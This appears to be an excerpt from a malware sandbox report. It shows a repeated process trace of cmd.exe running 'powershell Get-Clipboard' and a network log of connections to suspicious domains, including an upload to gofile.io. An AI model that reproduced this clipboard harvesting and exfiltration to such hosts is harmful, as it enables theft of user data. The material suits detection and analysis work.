C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 nova-screen-webview.com udp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 8.8.8.8:53 107.218.67.172.in-addr.arpa udp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:80 www.google.com tcp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.4.4:443 dns.google tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 nova-sentinel.com udp
IT 185.196.9.89:443 nova-sentinel.com tcp
US 8.8.8.8:53 89.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 8.8.8.8:53 ieatpoop.info udp
US 8.8.8.8:53 github.com udp
IT 185.196.9.97:443 ieatpoop.info tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
